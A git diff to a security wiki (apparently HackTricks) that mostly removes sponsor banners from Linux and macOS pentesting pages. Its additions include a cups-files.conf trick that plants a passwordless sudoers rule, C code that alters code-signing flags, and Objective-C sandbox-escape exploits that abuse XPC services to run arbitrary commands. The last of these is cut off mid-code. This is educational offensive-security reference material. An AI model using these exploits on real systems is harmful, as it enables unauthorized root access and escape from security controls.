diff --git a/src/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md b/src/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md
index 5391e3c9d..5099beb65 100644
--- a/src/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md
+++ b/src/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md
@@ -2,14 +2,6 @@
{{#include ../../banners/hacktricks-training.md}}
-
-
-\
-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-
## Common Limitations Bypasses
### Reverse Shell
@@ -356,12 +348,6 @@ If you are inside a filesystem with the **read-only and noexec protections** or
- [https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0](https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0)
- [https://www.secjuice.com/web-application-firewall-waf-evasion/](https://www.secjuice.com/web-application-firewall-waf-evasion/)
-
-
-\
-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-unix/privilege-escalation/exploiting-yum.md b/src/linux-unix/privilege-escalation/exploiting-yum.md
index c4bec532f..627bf66d7 100644
--- a/src/linux-unix/privilege-escalation/exploiting-yum.md
+++ b/src/linux-unix/privilege-escalation/exploiting-yum.md
@@ -23,3 +23,5 @@ The example below creates a package that includes a before-install trigger with
```
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-unix/privilege-escalation/interesting-groups-linux-pe.md b/src/linux-unix/privilege-escalation/interesting-groups-linux-pe.md
index e790cd37d..5fec677b3 100644
--- a/src/linux-unix/privilege-escalation/interesting-groups-linux-pe.md
+++ b/src/linux-unix/privilege-escalation/interesting-groups-linux-pe.md
@@ -1,11 +1,6 @@
+
{{#include ../../banners/hacktricks-training.md}}
-
-
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=command-injection) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=command-injection" %}
# Sudo/Admin Groups
@@ -171,11 +166,7 @@ You can mount the root filesystem of the host machine to an instance’s volume,
[lxc - Privilege Escalation](lxd-privilege-escalation.md)
-
-
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=command-injection) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=command-injection" %}
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-auto-start-locations.md b/src/macos-hardening/macos-auto-start-locations.md
index 5bfd0ae9a..d2780faa6 100644
--- a/src/macos-hardening/macos-auto-start-locations.md
+++ b/src/macos-hardening/macos-auto-start-locations.md
@@ -1794,3 +1794,5 @@ RunService ()
- [https://github.com/D00MFist/PersistentJXA](https://github.com/D00MFist/PersistentJXA)
{{#include ../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-red-teaming/README.md b/src/macos-hardening/macos-red-teaming/README.md
index 3701205f8..09b6c1e73 100644
--- a/src/macos-hardening/macos-red-teaming/README.md
+++ b/src/macos-hardening/macos-red-teaming/README.md
@@ -2,13 +2,6 @@
{{#include ../../banners/hacktricks-training.md}}
-
-
-**Get a hacker's perspective on your web apps, network, and cloud**
-
-**Find and report critical, exploitable vulnerabilities with real business impact.** Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports.
-
-{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
## Abusing MDMs
@@ -254,12 +247,7 @@ When a file is downloaded in Safari, if its a "safe" file, it will be **automati
- [**Come to the Dark Side, We Have Apples: Turning macOS Management Evil**](https://www.youtube.com/watch?v=pOQOh07eMxY)
- [**OBTS v3.0: "An Attackers Perspective on Jamf Configurations" - Luke Roberts / Calum Hall**](https://www.youtube.com/watch?v=ju1IYWUv4ZA)
-
-
-**Get a hacker's perspective on your web apps, network, and cloud**
-
-**Find and report critical, exploitable vulnerabilities with real business impact.** Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports.
-
-{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-red-teaming/macos-keychain.md b/src/macos-hardening/macos-red-teaming/macos-keychain.md
index a6135959d..177798fe0 100644
--- a/src/macos-hardening/macos-red-teaming/macos-keychain.md
+++ b/src/macos-hardening/macos-red-teaming/macos-keychain.md
@@ -132,3 +132,5 @@ And these are the **requirements** to be able to **export a secret without a pro
- [**#OBTS v5.0: "Lock Picking the macOS Keychain" - Cody Thomas**](https://www.youtube.com/watch?v=jKE1ZW33JpY)
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-red-teaming/macos-mdm/README.md b/src/macos-hardening/macos-red-teaming/macos-mdm/README.md
index 1a4f69c6e..30ef4cbb4 100644
--- a/src/macos-hardening/macos-red-teaming/macos-mdm/README.md
+++ b/src/macos-hardening/macos-red-teaming/macos-mdm/README.md
@@ -201,3 +201,5 @@ enrolling-devices-in-other-organisations.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-red-teaming/macos-mdm/enrolling-devices-in-other-organisations.md b/src/macos-hardening/macos-red-teaming/macos-mdm/enrolling-devices-in-other-organisations.md
index 19851b925..2c8dc0ad4 100644
--- a/src/macos-hardening/macos-red-teaming/macos-mdm/enrolling-devices-in-other-organisations.md
+++ b/src/macos-hardening/macos-red-teaming/macos-mdm/enrolling-devices-in-other-organisations.md
@@ -51,3 +51,5 @@ The research highlighted significant security concerns:
1. **Information Disclosure**: By providing a DEP-registered serial number, sensitive organizational information contained in the DEP profile can be retrieved.
{{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-red-teaming/macos-mdm/macos-serial-number.md b/src/macos-hardening/macos-red-teaming/macos-mdm/macos-serial-number.md
index 4b373d774..28e9aaee6 100644
--- a/src/macos-hardening/macos-red-teaming/macos-mdm/macos-serial-number.md
+++ b/src/macos-hardening/macos-red-teaming/macos-mdm/macos-serial-number.md
@@ -38,3 +38,5 @@ This character varies from 'C' (representing the first half of 2010) to 'Z' (sec
Digits 1-9 correspond to weeks 1-9. Letters C-Y (excluding vowels and 'S') represent weeks 10-27. For the second half of the year, 26 is added to this number.
{{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/README.md
index 7fa9d3ae9..3a0450178 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/README.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/README.md
@@ -2,21 +2,6 @@
{{#include ../../banners/hacktricks-training.md}}
-
-
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
-
-**Hacking Insights**\
-Engage with content that delves into the thrill and challenges of hacking
-
-**Real-Time Hack News**\
-Keep up-to-date with fast-paced hacking world through real-time news and insights
-
-**Latest Announcements**\
-Stay informed with the newest bug bounties launching and crucial platform updates
-
-**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
-
## Basic MacOS
If you are not familiar with macOS, you should start learning the basics of macOS:
@@ -132,19 +117,6 @@ macos-privilege-escalation.md
- [**https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ**](https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ)
- [**https://www.youtube.com/watch?v=vMGiplQtjTY**](https://www.youtube.com/watch?v=vMGiplQtjTY)
-
-
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
-
-**Hacking Insights**\
-Engage with content that delves into the thrill and challenges of hacking
-
-**Real-Time Hack News**\
-Keep up-to-date with fast-paced hacking world through real-time news and insights
-
-**Latest Announcements**\
-Stay informed with the newest bug bounties launching and crucial platform updates
-
-**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
-
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md
index 306efd482..5b8b45324 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md
@@ -69,3 +69,5 @@ macos-system-extensions.md
- [**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html)
{{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-function-hooking.md b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-function-hooking.md
index 424ed20b7..2fcc7d8e8 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-function-hooking.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-function-hooking.md
@@ -356,3 +356,5 @@ static void customConstructor(int argc, const char **argv) {
- [https://nshipster.com/method-swizzling/](https://nshipster.com/method-swizzling/)
{{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-iokit.md b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-iokit.md
index 5381cb0d0..35469c807 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-iokit.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-iokit.md
@@ -230,3 +230,5 @@ After the array is created you can see all the exported functions:
> If you remember, to **call** an **exported** function from user space we don't need to call the name of the function, but the **selector number**. Here you can see that the selector **0** is the function **`initializeDecoder`**, the selector **1** is **`startDecoder`**, the selector **2** **`initializeEncoder`**...
{{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md
index c62c79223..a90363d6b 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md
@@ -849,3 +849,5 @@ For more info check:
- [https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/)
{{#include ../../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md
index 4258ded90..627f62657 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md
@@ -148,3 +148,5 @@ nm -a binaries/com.apple.security.sandbox | wc -l
- [https://www.youtube.com/watch?v=hGKOskSiaQo](https://www.youtube.com/watch?v=hGKOskSiaQo)
{{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-vulnerabilities.md b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-vulnerabilities.md
index bb6bb0697..a41b2c95e 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-vulnerabilities.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-vulnerabilities.md
@@ -8,3 +8,5 @@
[**PoC**](https://github.com/jhftss/POC/tree/main/CVE-2022-46722).
{{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md
index 83bdf0dc2..6a9ebaa76 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md
@@ -81,3 +81,5 @@ At the end this was fixed by giving the new permission **`kTCCServiceEndpointSec
- [**https://knight.sc/reverse%20engineering/2019/08/24/system-extension-internals.html**](https://knight.sc/reverse%20engineering/2019/08/24/system-extension-internals.html)
{{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-applefs.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-applefs.md
index 7e9bb6e6d..08567ad22 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-applefs.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-applefs.md
@@ -32,3 +32,5 @@ The list of firmlinks can be found in the **`/usr/share/firmlinks`** file.
```
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.md
index 4561700b5..831fb3bd2 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.md
@@ -346,3 +346,5 @@ It's also possible to manage files **using `NSURL` objects instead of `NSString`
```
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md
index 7d376dfe5..e97f1be4c 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md
@@ -84,3 +84,5 @@ macos-proces-abuse/
- [https://www.youtube.com/watch?v=UlT5KFTMn2k](https://www.youtube.com/watch?v=UlT5KFTMn2k)
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-defensive-apps.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-defensive-apps.md
index a41d941e4..29a9dc9f9 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-defensive-apps.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-defensive-apps.md
@@ -17,3 +17,5 @@
- [**ReiKey**](https://objective-see.org/products/reikey.html): Objective-See application to find **keyloggers** that install keyboard "event taps"
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld_insert_libraries.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld_insert_libraries.md
index a1a52c47b..210dd1928 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld_insert_libraries.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld_insert_libraries.md
@@ -164,3 +164,5 @@ sudo log stream --style syslog --predicate 'eventMessage CONTAINS[c] "[+] dylib"
```
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-file-extension-apps.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-file-extension-apps.md
index 6ff21c8e4..6d789ddd4 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-file-extension-apps.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-file-extension-apps.md
@@ -70,3 +70,5 @@ grep -A3 CFBundleTypeExtensions Info.plist | grep string
```
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-gcd-grand-central-dispatch.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-gcd-grand-central-dispatch.md
index 7f66f04fa..89b1f1b76 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-gcd-grand-central-dispatch.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-gcd-grand-central-dispatch.md
@@ -223,3 +223,5 @@ Ghidra will automatically rewrite everything:
- [**\*OS Internals, Volume I: User Mode. By Jonathan Levin**](https://www.amazon.com/MacOS-iOS-Internals-User-Mode/dp/099105556X)
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md
index fa8e2aeb4..2b9f486ce 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md
@@ -245,3 +245,5 @@ macos-files-folders-and-binaries/macos-sensitive-locations.md
{{#endref}}
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-protocols.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-protocols.md
index ea04eac00..cc012147d 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-protocols.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-protocols.md
@@ -126,3 +126,5 @@ sudo launchctl unload -w /System/Library/LaunchDaemons/com.apple.mDNSResponder.p
- [**https://lockboxx.blogspot.com/2019/07/macos-red-teaming-206-ard-apple-remote.html**](https://lockboxx.blogspot.com/2019/07/macos-red-teaming-206-ard-apple-remote.html)
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md
index 991e34f0b..6de0e5c0f 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md
@@ -30,10 +30,16 @@ Example in: [https://theevilbit.github.io/posts/exploiting_directory_permissions
## Symbolic Link / Hard Link
+### Permissive file/folder
+
If a privileged process is writing data in **file** that could be **controlled** by a **lower privileged user**, or that could be **previously created** by a lower privileged user. The user could just **point it to another file** via a Symbolic or Hard link, and the privileged process will write on that file.
Check in the other sections where an attacker could **abuse an arbitrary write to escalate privileges**.
+### Open `O_NOFOLLOW`
+
+The flag `O_NOFOLLOW` when used by the function `open` won't follow a symlink in the last path component, but it will follow the rest of the path. The correct way to prevent following symlinks in the path is by using the flag `O_NOFOLLOW_ANY`.
+
## .fileloc
Files with **`.fileloc`** extension can point to other applications or binaries so when they are open, the application/binary will be the one executed.\
@@ -52,11 +58,15 @@ Example:
```
-## Arbitrary FD
+## File Descriptors
+
+### Leak FD (no `O_CLOEXEC`)
+
+If a call to `open` doesn't have the flag `O_CLOEXEC` the file descriptor will be inherited by the child process. So, if a privileged process opens a privileged file and executes a process controlled by the attacker, the attacker will **inherit the FD over the privielged file**.
If you can make a **process open a file or a folder with high privileges**, you can abuse **`crontab`** to open a file in `/etc/sudoers.d` with **`EDITOR=exploit.py`**, so the `exploit.py` will get the FD to the file inside `/etc/sudoers` and abuse it.
-For example: [https://youtu.be/f1HA5QhLQ7Y?t=21098](https://youtu.be/f1HA5QhLQ7Y?t=21098)
+For example: [https://youtu.be/f1HA5QhLQ7Y?t=21098](https://youtu.be/f1HA5QhLQ7Y?t=21098), code: https://github.com/gergelykalman/CVE-2023-32428-a-macOS-LPE-via-MallocStackLogging
## Avoid quarantine xattrs tricks
@@ -154,6 +164,31 @@ Not really needed but I leave it there just in case:
macos-xattr-acls-extra-stuff.md
{{#endref}}
+## Bypass signature checks
+
+### Bypass platform binaries checks
+
+Some security checks check if the binary is a **platform binary**, for example to allow to connect to a XPC service. However, as exposed in on bypass in https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/ it's possible to bypass this check by getting a platform binary (like /bin/ls) and inject the exploit via dyld using en env variable `DYLD_INSERT_LIBRARIES`.
+
+### Bypass flags `CS_REQUIRE_LV` and `CS_FORCED_LV`
+
+It's possible for an executing binary to modify it's own flags to bypass checks with a code such as:
+
+```c
+// Code from https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/
+int pid = getpid();
+NSString *exePath = NSProcessInfo.processInfo.arguments[0];
+
+uint32_t status = SecTaskGetCodeSignStatus(SecTaskCreateFromSelf(0));
+status |= 0x2000; // CS_REQUIRE_LV
+csops(pid, 9, &status, 4); // CS_OPS_SET_STATUS
+
+status = SecTaskGetCodeSignStatus(SecTaskCreateFromSelf(0));
+NSLog(@"=====Inject successfully into %d(%@), csflags=0x%x", pid, exePath, status);
+```
+
+
+
## Bypass Code Signatures
Bundles contains the file **`_CodeSignature/CodeResources`** which contains the **hash** of every single **file** in the **bundle**. Note that the hash of CodeResources is also **embedded in the executable**, so we can't mess with that, either.
@@ -279,6 +314,28 @@ The file **`/etc/paths`** is one of the main places that populates the PATH env
You can also write files in **`/etc/paths.d`** to load new folders into the `PATH` env variable.
+### cups-files.conf
+
+This technique was used in [this writeup](https://www.kandji.io/blog/macos-audit-story-part1).
+
+Create the file `/etc/cups/cups-files.conf` with the following content:
+
+```
+ErrorLog /etc/sudoers.d/lpe
+LogFilePerm 777
+
+```
+
+This will create the file `/etc/sudoers.d/lpe` with permissions 777. The extra junk at the end is to trigger the error log creation.
+
+Then, write in `/etc/sudoers.d/lpe` the needed config to escalate privileges like `%staff ALL=(ALL) NOPASSWD:ALL`.
+
+Then, modify the file `/etc/cups/cups-files.conf` again indicating `LogFilePerm 700` so the new sudoers file becomes valid invoking `cupsctl`.
+
+### Sandbox Escape
+
+It's posisble to escape the macOS sandbox with a FS arbitrary write. For some examples check the page [macOS Auto Start](../../../../macos-auto-start-locations.md) but a common one is to write a Terminal preferences file in `~/Library/Preferences/com.apple.Terminal.plist` that executes a command at startup and call it using `open`.
+
## Generate writable files as other users
This will generate a file that belongs to root that is writable by me ([**code from here**](https://github.com/gergelykalman/brew-lpe-via-periodic/blob/main/brew_lpe.sh)). This might also work as privesc:
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md
index 35232afa4..9ce8be51f 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md
@@ -2,9 +2,6 @@
{{#include ../../../banners/hacktricks-training.md}}
-
-
-{% embed url="https://websec.nl/" %}
## Gatekeeper
@@ -475,9 +472,6 @@ aa archive -d s/ -o app.aar
In an ".app" bundle if the quarantine xattr is not added to it, when executing it **Gatekeeper won't be triggered**.
-
-
-{% embed url="https://websec.nl/" %}
{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/README.md
index 5bc3c7da9..79897f40a 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/README.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/README.md
@@ -151,7 +151,9 @@ Important **system services** also run inside their own custom **sandbox** such
**App Store** apps use the **profile** **`/System/Library/Sandbox/Profiles/application.sb`**. You can check in this profile how entitlements such as **`com.apple.security.network.server`** allows a process to use the network.
-SIP is a Sandbox profile called platform_profile in /System/Library/Sandbox/rootless.conf
+Then, some **Apple daemon services** use different profiles located in `/System/Library/Sandbox/Profiles/*.sb` or `/usr/share/sandbox/*.sb`. These sandboxes are applied in the main funciton calling the API `sandbox_init_XXX`.
+
+**SIP** is a Sandbox profile called platform_profile in `/System/Library/Sandbox/rootless.conf`.
### Sandbox Profile Examples
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md
index 8e917b9f3..51df66ce3 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md
@@ -59,6 +59,162 @@ If from then sandbox process you are able to **compromise other processes** runn
../../../macos-proces-abuse/
{{#endref}}
+### Available System and User Mach services
+
+The sandbox also allow to communicate with certain **Mach services** via XPC defined in the profile `application.sb`. If you are able to **abuse** one of these services you might be able to **escape the sandbox**.
+
+As indicated in [this writeup](https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/), the info about Mach services is stored in `/System/Library/xpc/launchd.plist`. It's possible to find all the System and User Mach services by searching inside that file for `System` and `User`.
+
+Moreover, it's possible to check if a Mach service is available to a sandboxed application by calling the `bootstrap_look_up`:
+
+```objectivec
+void checkService(const char *serviceName) {
+ mach_port_t service_port = MACH_PORT_NULL;
+ kern_return_t err = bootstrap_look_up(bootstrap_port, serviceName, &service_port);
+ if (!err) {
+ NSLog(@"available service:%s", serviceName);
+ mach_port_deallocate(mach_task_self_, service_port);
+ }
+}
+
+void print_available_xpc(void) {
+ NSDictionary* dict = [NSDictionary dictionaryWithContentsOfFile:@"/System/Library/xpc/launchd.plist"];
+ NSDictionary* launchDaemons = dict[@"LaunchDaemons"];
+ for (NSString* key in launchDaemons) {
+ NSDictionary* job = launchDaemons[key];
+ NSDictionary* machServices = job[@"MachServices"];
+ for (NSString* serviceName in machServices) {
+ checkService(serviceName.UTF8String);
+ }
+ }
+}
+```
+
+### Available PID Mach services
+
+These Mach services were firstly abused to [escape from the sandbox in this writeup](https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/). By that time, **all the XPC services required** by an application and its framework were visible in the app's PID domain (these are Mach Services with `ServiceType` as `Application`).
+
+In order to **contact a PID Domain XPC service**, it's just needed to register it inside the app with a line such as:
+
+```objectivec
+[[NSBundle bundleWithPath:@“/System/Library/PrivateFrameworks/ShoveService.framework"]load];
+```
+
+Moreover, It's possible to find all the **Application** Mach services by searching inside `System/Library/xpc/launchd.plist` for `Application`.
+
+Another way to find valid xpc services is to check the ones in:
+
+```bash
+find /System/Library/Frameworks -name "*.xpc"
+find /System/Library/PrivateFrameworks -name "*.xpc"
+```
+
+Several examples abusing this technique can be found in the [**original writeup**](https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/), however, the following are some sumarized examples.
+
+#### /System/Library/PrivateFrameworks/StorageKit.framework/XPCServices/storagekitfsrunner.xpc
+
+This services allows every XPC connection by returning always `YES` and the method `runTask:arguments:withReply:` executes an arbitrary command with arbitrary params.
+
+The exploit was "as simple as":
+
+```objectivec
+@protocol SKRemoteTaskRunnerProtocol
+-(void)runTask:(NSURL *)task arguments:(NSArray *)args withReply:(void (^)(NSNumber *, NSError *))reply;
+@end
+
+void exploit_storagekitfsrunner(void) {
+ [[NSBundle bundleWithPath:@"/System/Library/PrivateFrameworks/StorageKit.framework"] load];
+ NSXPCConnection * conn = [[NSXPCConnection alloc] initWithServiceName:@"com.apple.storagekitfsrunner"];
+ conn.remoteObjectInterface = [NSXPCInterface interfaceWithProtocol:@protocol(SKRemoteTaskRunnerProtocol)];
+ [conn setInterruptionHandler:^{NSLog(@"connection interrupted!");}];
+ [conn setInvalidationHandler:^{NSLog(@"connection invalidated!");}];
+ [conn resume];
+
+ [[conn remoteObjectProxy] runTask:[NSURL fileURLWithPath:@"/usr/bin/touch"] arguments:@[@"/tmp/sbx"] withReply:^(NSNumber *bSucc, NSError *error) {
+ NSLog(@"run task result:%@, error:%@", bSucc, error);
+ }];
+}
+```
+
+#### /System/Library/PrivateFrameworks/AudioAnalyticsInternal.framework/XPCServices/AudioAnalyticsHelperService.xpc
+
+This XPC service allowed every client bu always returning YES and the method `createZipAtPath:hourThreshold:withReply:` basically allowed to indicate the path to a folder to compress and it'll compress it in a ZIP file.
+
+Therefore, it's possible to generate a fake app folder structure, compress it, then decompress and execute it to escape the sandbox as the new files won't have the quarantine attribute.
+
+The exploit was:
+
+```objectivec
+@protocol AudioAnalyticsHelperServiceProtocol
